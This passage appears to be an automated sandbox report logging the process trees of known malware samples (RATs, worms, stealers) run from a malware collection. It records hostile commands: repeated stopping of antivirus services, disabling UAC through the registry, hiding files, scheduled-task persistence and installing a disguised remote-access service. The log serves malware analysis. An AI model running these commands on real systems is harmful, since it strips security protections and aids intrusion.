    NET STOP SWEEPSRV.SYS
    3⤵
    PID:7104
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP SWEEPSRV.SYS
      4⤵
      PID:348
- - C:\Windows\SysWOW64\NET.exe
    NET STOP NAVAPSVC
    3⤵
    PID:5784
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP NAVAPSVC
      4⤵
      PID:6092
- - C:\Windows\SysWOW64\NET.exe
    NET STOP PERSFW
    3⤵
    PID:6800
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP PERSFW
      4⤵
      PID:1484
- - C:\Windows\SysWOW64\NET.exe
    NET STOP AVPCC
    3⤵
    PID:7140
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP AVPCC
      4⤵
      PID:5116
- - C:\Windows\SysWOW64\NET.exe
    NET STOP MCSHIELD
    3⤵
    PID:5432
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP MCSHIELD
      4⤵
      PID:6804
- - C:\Windows\SysWOW64\NET.exe
    NET STOP SWEEPSRV.SYS
    3⤵
    PID:6364
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP SWEEPSRV.SYS
      4⤵
      PID:5480
- - C:\Windows\SysWOW64\NET.exe
    NET STOP NAVAPSVC
    3⤵
    PID:2496
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP NAVAPSVC
      4⤵
      PID:2452
- - C:\Windows\SysWOW64\NET.exe
    NET STOP PERSFW
    3⤵
    PID:5892
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP PERSFW
      4⤵
      PID:5196
- - C:\Windows\SysWOW64\NET.exe
    NET STOP AVPCC
    3⤵
    PID:2364
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP AVPCC
      4⤵
      PID:1340
- - C:\Windows\SysWOW64\NET.exe
    NET STOP MCSHIELD
    3⤵
    - System Location Discovery: System Language Discovery
    PID:7136
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP MCSHIELD
      4⤵
      PID:2640
- - C:\Windows\SysWOW64\NET.exe
    NET STOP SWEEPSRV.SYS
    3⤵
    PID:6712
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP SWEEPSRV.SYS
      4⤵
      PID:1100
- - C:\Windows\SysWOW64\NET.exe
    NET STOP NAVAPSVC
    3⤵
    PID:5068
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP NAVAPSVC
      4⤵
      PID:6096
- - C:\Windows\SysWOW64\NET.exe
    NET STOP PERSFW
    3⤵
    PID:6192
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP PERSFW
      4⤵
      PID:5796
- - C:\Windows\SysWOW64\NET.exe
    NET STOP AVPCC
    3⤵
    PID:5760
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP AVPCC
      4⤵
      PID:5388
- - C:\Windows\SysWOW64\NET.exe
    NET STOP MCSHIELD
    3⤵
    PID:6912
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP MCSHIELD
      4⤵
      PID:5428
- - C:\Windows\SysWOW64\NET.exe
    NET STOP SWEEPSRV.SYS
    3⤵
    PID:6064
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP SWEEPSRV.SYS
      4⤵
      PID:6312
- - C:\Windows\SysWOW64\NET.exe
    NET STOP NAVAPSVC
    3⤵
    PID:4932
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP NAVAPSVC
      4⤵
      PID:6584
- - C:\Windows\SysWOW64\NET.exe
    NET STOP PERSFW
    3⤵
    PID:3876
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP PERSFW
      4⤵
      PID:4860
- - C:\Windows\SysWOW64\NET.exe
    NET STOP AVPCC
    3⤵
    PID:3544
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP AVPCC
      4⤵
      PID:5872
- - C:\Windows\SysWOW64\NET.exe
    NET STOP MCSHIELD
    3⤵
    PID:3760
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP MCSHIELD
      4⤵
      PID:2704
- - C:\Windows\SysWOW64\NET.exe
    NET STOP SWEEPSRV.SYS
    3⤵
    PID:5752
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP SWEEPSRV.SYS
      4⤵
      PID:5564
- - C:\Windows\SysWOW64\NET.exe
    NET STOP NAVAPSVC
    3⤵
    PID:1152
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP NAVAPSVC
      4⤵
      PID:6576
- - C:\Windows\SysWOW64\NET.exe
    NET STOP PERSFW
    3⤵
    PID:5804
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP PERSFW
      4⤵
      PID:1204
- - C:\Windows\SysWOW64\NET.exe
    NET STOP AVPCC
    3⤵
    PID:5944
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP AVPCC
      4⤵
      PID:7072
- - C:\Windows\SysWOW64\NET.exe
    NET STOP MCSHIELD
    3⤵
    PID:2724
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP MCSHIELD
      4⤵
      PID:1060
- - C:\Windows\SysWOW64\NET.exe
    NET STOP SWEEPSRV.SYS
    3⤵
    PID:5432
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP SWEEPSRV.SYS
      4⤵
      PID:1180
- - C:\Windows\SysWOW64\NET.exe
    NET STOP NAVAPSVC
    3⤵
    PID:5420
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP NAVAPSVC
      4⤵
      PID:6816
- - C:\Windows\SysWOW64\NET.exe
    NET STOP PERSFW
    3⤵
    PID:3036
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP PERSFW
      4⤵
      PID:2672
- - C:\Windows\SysWOW64\NET.exe
    NET STOP AVPCC
    3⤵
    PID:6244
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP AVPCC
      4⤵
      PID:7164
- - C:\Windows\SysWOW64\NET.exe
    NET STOP MCSHIELD
    3⤵
    PID:3544
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP MCSHIELD
      4⤵
      System Location Discovery: System Language Discovery
      PID:7072
- - C:\Windows\SysWOW64\NET.exe
    NET STOP SWEEPSRV.SYS
    3⤵
    PID:3464
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP SWEEPSRV.SYS
      4⤵
      PID:1060
- - C:\Windows\SysWOW64\NET.exe
    NET STOP NAVAPSVC
    3⤵
    PID:5872
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP NAVAPSVC
      4⤵
      PID:1040
- - C:\Windows\SysWOW64\NET.exe
    NET STOP PERSFW
    3⤵
    PID:3080
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP PERSFW
      4⤵
      PID:6076
- - C:\Windows\SysWOW64\NET.exe
    NET STOP AVPCC
    3⤵
    PID:6916
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP AVPCC
      4⤵
      PID:6348
- - C:\Windows\SysWOW64\NET.exe
    NET STOP MCSHIELD
    3⤵
    PID:5884
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP MCSHIELD
      4⤵
      PID:1152
- - C:\Windows\SysWOW64\NET.exe
    NET STOP SWEEPSRV.SYS
    3⤵
    PID:4816
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP SWEEPSRV.SYS
      4⤵
      PID:5808
- - C:\Windows\SysWOW64\NET.exe
    NET STOP NAVAPSVC
    3⤵
    PID:4356
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP NAVAPSVC
      4⤵
      PID:2640
- - C:\Windows\SysWOW64\NET.exe
    NET STOP PERSFW
    3⤵
    - System Location Discovery: System Language Discovery
    PID:6196
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP PERSFW
      4⤵
      PID:4256
- - C:\Windows\SysWOW64\NET.exe
    NET STOP AVPCC
    3⤵
    PID:5904
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP AVPCC
      4⤵
      PID:5440
- - C:\Windows\SysWOW64\NET.exe
    NET STOP MCSHIELD
    3⤵
    PID:6568
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP MCSHIELD
      4⤵
      PID:5852
- - C:\Windows\SysWOW64\NET.exe
    NET STOP SWEEPSRV.SYS
    3⤵
    PID:6080
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP SWEEPSRV.SYS
      4⤵
      PID:5684
- - C:\Windows\SysWOW64\NET.exe
    NET STOP NAVAPSVC
    3⤵
    PID:2632
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP NAVAPSVC
      4⤵
      PID:5872
- - C:\Windows\SysWOW64\NET.exe
    NET STOP PERSFW
    3⤵
    PID:2736
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP PERSFW
      4⤵
      PID:7124
- - C:\Windows\SysWOW64\NET.exe
    NET STOP AVPCC
    3⤵
    PID:6360
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP AVPCC
      4⤵
      PID:6576
- - C:\Windows\SysWOW64\NET.exe
    NET STOP MCSHIELD
    3⤵
    PID:4984
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP MCSHIELD
      4⤵
      PID:4676
- - C:\Windows\SysWOW64\NET.exe
    NET STOP SWEEPSRV.SYS
    3⤵
    PID:6504
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP SWEEPSRV.SYS
      4⤵
      PID:2032
- - C:\Windows\SysWOW64\NET.exe
    NET STOP NAVAPSVC
    3⤵
    PID:5984
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP NAVAPSVC
      4⤵
      PID:5524
- - C:\Windows\SysWOW64\NET.exe
    NET STOP PERSFW
    3⤵
    PID:7160
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP PERSFW
      4⤵
      System Location Discovery: System Language Discovery
      PID:2524
- - C:\Windows\SysWOW64\NET.exe
    NET STOP AVPCC
    3⤵
    PID:3496
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP AVPCC
      4⤵
      PID:1160
- - C:\Windows\SysWOW64\NET.exe
    NET STOP MCSHIELD
    3⤵
    PID:5224
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP MCSHIELD
      4⤵
      PID:4544
- - C:\Windows\SysWOW64\NET.exe
    NET STOP SWEEPSRV.SYS
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5504
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP SWEEPSRV.SYS
      4⤵
      PID:5176
- - C:\Windows\SysWOW64\NET.exe
    NET STOP NAVAPSVC
    3⤵
    PID:5192
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP NAVAPSVC
      4⤵
      System Location Discovery: System Language Discovery
      PID:5648
- - C:\Windows\SysWOW64\NET.exe
    NET STOP PERSFW
    3⤵
    PID:1236
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP PERSFW
      4⤵
      PID:1176
- - C:\Windows\SysWOW64\NET.exe
    NET STOP AVPCC
    3⤵
    PID:7108
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP AVPCC
      4⤵
      PID:788
- - C:\Windows\SysWOW64\NET.exe
    NET STOP MCSHIELD
    3⤵
    PID:4764
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP MCSHIELD
      4⤵
      PID:2336
- - C:\Windows\SysWOW64\NET.exe
    NET STOP SWEEPSRV.SYS
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2288
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP SWEEPSRV.SYS
      4⤵
      PID:7032
- - C:\Windows\SysWOW64\NET.exe
    NET STOP NAVAPSVC
    3⤵
    PID:6744
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP NAVAPSVC
      4⤵
      PID:7164
- - C:\Windows\SysWOW64\NET.exe
    NET STOP PERSFW
    3⤵
    PID:6116
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP PERSFW
      4⤵
      PID:3848
- - C:\Windows\SysWOW64\NET.exe
    NET STOP AVPCC
    3⤵
    PID:964
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP AVPCC
      4⤵
      PID:5668
- - C:\Windows\SysWOW64\NET.exe
    NET STOP MCSHIELD
    3⤵
    PID:5436
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP MCSHIELD
      4⤵
      PID:6660
- - C:\Windows\SysWOW64\NET.exe
    NET STOP SWEEPSRV.SYS
    3⤵
    PID:1484
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP SWEEPSRV.SYS
      4⤵
      PID:5924
- - C:\Windows\SysWOW64\NET.exe
    NET STOP NAVAPSVC
    3⤵
    PID:6964
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP NAVAPSVC
      4⤵
      PID:5492
- - C:\Windows\SysWOW64\NET.exe
    NET STOP PERSFW
    3⤵
    PID:1080
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP PERSFW
      4⤵
      PID:4604
- - C:\Windows\SysWOW64\NET.exe
    NET STOP AVPCC
    3⤵
    PID:2060
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP AVPCC
      4⤵
      PID:4776
- - C:\Windows\SysWOW64\NET.exe
    NET STOP MCSHIELD
    3⤵
    PID:5228
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP MCSHIELD
      4⤵
      System Location Discovery: System Language Discovery
      PID:6732
- - C:\Windows\SysWOW64\NET.exe
    NET STOP SWEEPSRV.SYS
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4596
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP SWEEPSRV.SYS
      4⤵
      PID:6348
- - C:\Windows\SysWOW64\NET.exe
    NET STOP NAVAPSVC
    3⤵
    PID:6068
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP NAVAPSVC
      4⤵
      PID:7036
- - C:\Windows\SysWOW64\NET.exe
    NET STOP PERSFW
    3⤵
    PID:2524
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP PERSFW
      4⤵
      PID:6880
- - C:\Windows\SysWOW64\NET.exe
    NET STOP AVPCC
    3⤵
    - System Location Discovery: System Language Discovery
    PID:6856
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP AVPCC
      4⤵
      PID:3628
- - C:\Windows\SysWOW64\NET.exe
    NET STOP MCSHIELD
    3⤵
    PID:6724
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP MCSHIELD
      4⤵
      PID:5672
- - C:\Windows\SysWOW64\NET.exe
    NET STOP SWEEPSRV.SYS
    3⤵
    PID:2324
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP SWEEPSRV.SYS
      4⤵
      PID:6936
- - C:\Windows\SysWOW64\NET.exe
    NET STOP NAVAPSVC
    3⤵
    PID:5508
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP NAVAPSVC
      4⤵
      PID:5308
- - C:\Windows\SysWOW64\NET.exe
    NET STOP PERSFW
    3⤵
    PID:5552
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP PERSFW
      4⤵
      PID:5732
- - C:\Windows\SysWOW64\NET.exe
    NET STOP AVPCC
    3⤵
    PID:2580
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP AVPCC
      4⤵
      PID:2288
- - C:\Windows\SysWOW64\NET.exe
    NET STOP MCSHIELD
    3⤵
    PID:6872
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP MCSHIELD
      4⤵
      PID:5440
- - C:\Windows\SysWOW64\NET.exe
    NET STOP SWEEPSRV.SYS
    3⤵
    PID:5480
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP SWEEPSRV.SYS
      4⤵
      PID:7012
- - C:\Windows\SysWOW64\NET.exe
    NET STOP NAVAPSVC
    3⤵
    PID:5072
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP NAVAPSVC
      4⤵
      System Location Discovery: System Language Discovery
      PID:5536
- - C:\Windows\SysWOW64\NET.exe
    NET STOP PERSFW
    3⤵
    PID:664
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP PERSFW
      4⤵
      PID:7164
- - C:\Windows\SysWOW64\NET.exe
    NET STOP AVPCC
    3⤵
    PID:1596
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP AVPCC
      4⤵
      PID:6244
- - C:\Windows\SysWOW64\NET.exe
    NET STOP MCSHIELD
    3⤵
    PID:2120
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP MCSHIELD
      4⤵
      PID:2724
- - C:\Windows\SysWOW64\NET.exe
    NET STOP SWEEPSRV.SYS
    3⤵
    PID:2936
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP SWEEPSRV.SYS
      4⤵
      PID:3948

C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Net-Worm\EternalRocks.exe
"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Net-Worm\EternalRocks.exe"
1⤵
PID:4716

C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Net-Worm\Blaster\Blaster.A.exe
"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Net-Worm\Blaster\Blaster.A.exe"
1⤵
- Adds Run key to start application
PID:3412

C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Net-Worm\Rahack\Rahack.exe
"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Net-Worm\Rahack\Rahack.exe"
1⤵
PID:3616

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Pony\metrofax.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:3060
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:860

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
1⤵
- Subvert Trust Controls: Mark-of-the-Web Bypass
- Checks processor information in registry
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:4648

C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\Blackkomet.exe
"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\Blackkomet.exe"
1⤵
- Modifies WinLogon for persistence
- Adds Run key to start application
- Drops file in System32 directory
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:4832
- C:\Windows\SysWOW64\attrib.exe
  attrib "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\Blackkomet.exe" +s +h
  2⤵
  - Sets file to hidden
  - Views/modifies file attributes
  PID:644
- C:\Windows\SysWOW64\attrib.exe
  attrib "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT" +s +h
  2⤵
  - Sets file to hidden
  - Views/modifies file attributes
  PID:1860

C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\CrimsonRAT.exe
"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\CrimsonRAT.exe"
1⤵
PID:5068
- C:\ProgramData\Hdlharas\dlrarhsiva.exe
  "C:\ProgramData\Hdlharas\dlrarhsiva.exe"
  2⤵
  - Executes dropped EXE
  PID:3896

C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\NetWire.exe
"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\NetWire.exe"
1⤵
PID:4540
- C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\NetWire.exe
  "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\NetWire.exe"
  2⤵
  PID:236

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004D0 0x00000000000004DC
1⤵
PID:6260

C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\Remcos.exe
"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\Remcos.exe"
1⤵
- Adds Run key to start application
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:1072
- C:\Windows\SysWOW64\cmd.exe
  /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
  2⤵
  PID:5264
- - C:\Windows\SysWOW64\reg.exe
    C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    - UAC bypass
    - Modifies registry key
    PID:5436
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\install.bat" "
  2⤵
  PID:6056
- - C:\Windows\SysWOW64\PING.EXE
    PING 127.0.0.1 -n 2
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:5364
- - C:\Windows\SysWOW64\Userdata\Userdata.exe
    "C:\Windows\SysWOW64\Userdata\Userdata.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of SetThreadContext
    PID:6008
  - - C:\Windows\SysWOW64\cmd.exe
      /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
      4⤵
      PID:5728
    - - C:\Windows\SysWOW64\reg.exe
        
        C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        5⤵
        UAC bypass
        Modifies registry key
        
        PID:5124
  - - C:\Program Files (x86)\Internet Explorer\iexplore.exe
      "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
      4⤵
      Drops file in System32 directory
      Suspicious behavior: GetForegroundWindowSpam
      Suspicious use of SetWindowsHookEx
      PID:5560
    - - C:\Windows\SysWOW64\cmd.exe
        
        /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        5⤵
        
        PID:5380
      - C:\Windows\SysWOW64\reg.exe
        
        C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        6⤵
        UAC bypass
        Modifies registry key
        
        PID:6228

C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\WarzoneRAT.exe
"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\WarzoneRAT.exe"
1⤵
- Suspicious use of SetThreadContext
- NTFS ADS
- Suspicious use of AdjustPrivilegeToken
PID:6396
- C:\Windows\SysWOW64\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jFvfxe" /XML "C:\Users\Admin\AppData\Local\Temp\tmp7154.tmp"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:7024
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
  2⤵
  PID:4540

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Spyware\The Worst Of All!!!!!!\BonziBUDDY!!!!!!.txt
1⤵
PID:6024

C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Stealer\Azorult.exe
"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Stealer\Azorult.exe"
1⤵
- Modifies Windows Defender Real-time Protection settings
- UAC bypass
- Blocks application from running via registry modification
- Drops file in Drivers directory
- Hide Artifacts: Hidden Users
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:6728
- C:\ProgramData\Microsoft\Intel\wini.exe
  C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui
  2⤵
  - Executes dropped EXE
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx
  PID:6504
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"
    3⤵
    PID:6744
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "
      4⤵
      PID:6896
    - - C:\Windows\SysWOW64\regedit.exe
        
        regedit /s "reg1.reg"
        5⤵
        UAC bypass
        Windows security bypass
        Hide Artifacts: Hidden Users
        System Location Discovery: System Language Discovery
        Runs .reg file with regedit
        
        PID:1576
    - - C:\Windows\SysWOW64\regedit.exe
        
        regedit /s "reg2.reg"
        5⤵
        Runs .reg file with regedit
        
        PID:7116
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        5⤵
        Delays execution with timeout.exe
        
        PID:7152
    - - C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /silentinstall
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:1460
    - - C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /firewall
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:1556
    - - C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /start
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:5844
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows\*.*
        5⤵
        System Location Discovery: System Language Discovery
        Views/modifies file attributes
        
        PID:6096
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows
        5⤵
        Views/modifies file attributes
        
        PID:6048
    - - C:\Windows\SysWOW64\sc.exe
        
        sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000
        5⤵
        Launches sc.exe
        
        PID:6036
    - - C:\Windows\SysWOW64\sc.exe
        
        sc config RManService obj= LocalSystem type= interact type= own
        5⤵
        Launches sc.exe
        
        PID:5448
    - - C:\Windows\SysWOW64\sc.exe
        
        sc config RManService DisplayName= "Microsoft Framework"
        5⤵
        Launches sc.exe
        
        PID:5068
- - C:\ProgramData\Windows\winit.exe
    "C:\ProgramData\Windows\winit.exe"
    3⤵
    - Executes dropped EXE
    - Checks processor information in registry
    - Modifies registry class
    - Suspicious use of SetWindowsHookEx
    PID:6600
- C:\programdata\install\cheat.exe
  C:\programdata\install\cheat.exe -pnaxui
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:684
- - C:\ProgramData\Microsoft\Intel\taskhost.exe
    "C:\ProgramData\Microsoft\Intel\taskhost.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:5164
  - - C:\programdata\microsoft\intel\P.exe
      C:\programdata\microsoft\intel\P.exe
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:6516
  - - C:\programdata\microsoft\intel\R8.exe
      C:\programdata\microsoft\intel\R8.exe
      4⤵
      Executes dropped EXE
      Modifies registry class
      Suspicious use of SetWindowsHookEx
      PID:2932
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1072
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "
        6⤵
        Modifies registry class
        
        PID:6612
        
